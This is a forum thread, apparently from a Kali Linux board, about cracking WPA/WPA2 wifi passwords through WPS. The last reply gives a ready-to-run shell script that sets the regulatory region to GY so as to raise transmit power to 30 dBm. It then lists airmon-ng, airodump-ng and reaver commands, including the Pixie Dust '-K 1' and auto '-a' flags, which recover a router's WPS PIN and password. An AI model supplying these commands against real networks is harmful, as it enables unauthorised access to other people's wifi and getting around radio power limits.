View Full Version : Help Crack wifi with Router product later 2012

2016-06-10, 09:05
I use wifite in kali 2016.1 to crack wifi find password. Router my wifi on wps but when run,"WPS Pixie Dust Attack " is failure, then, only ttl in success/ttl is increasing, success not increasing and when it the end time 660 second it stop and capture handshake. Please what is issues, Solutions or Tool to fix problem?Thanks.
Note: My Router product year later 2013. my network card athk9, my Router TP-LINK TD

2016-06-15, 11:45
I suggest practicing with reaver or bully when doing a WPS pin attack. These tools give you more control over the process than wifite.

2016-08-01, 16:59
I crack WPA/WPA2 within a short time by using reaver. I use a wifi USB (ALFA one) and set the tx power to 30db.


echo "Hi, I will adjust your tx power to 30db!"
echo " disabling wlan1"
ifconfig wlan1 down
sleep 3

echo "setting Region to my World"
iw reg set GY
sleep 3

echo "setting TxPower to 30"
iwconfig wlan1 txpower 30
sleep 2

echo "enabling wlan1"
ifconfig wlan1 up
echo "enabling wlan1"
sleep 5

airmon-ng check kill
airmon-ng start wlan1
airodump-ng wlan1mon

echo "all done :)"

then I do the following:

1. iwconfig (check the wireless interfaces, I have wlan0 and wlan1 (wlan0 is built in card and wlan1 is USB)
2. airmon-ng check kill
3. airmon-ng start wlan1
4. airodump-ng wlan1mon (in new kali, the mon0 is changed to wlan1mon or wlan0mon)
5. once scan is done and you see targets, press CTRL, C to stop and open up new terminal
5. In new terminal type: reaver -i wlan1mon -b (BSSID) -c (channel number) -vv (verbose) -K 1

This will crack routers that are vunerable within seconds and produce pin and password

if not found use reaver with the -a flag

example: reaver -i wlan1mon -b (BSSID) -a

This will automatically change to best options for cracking, -a = auto

Hope this helps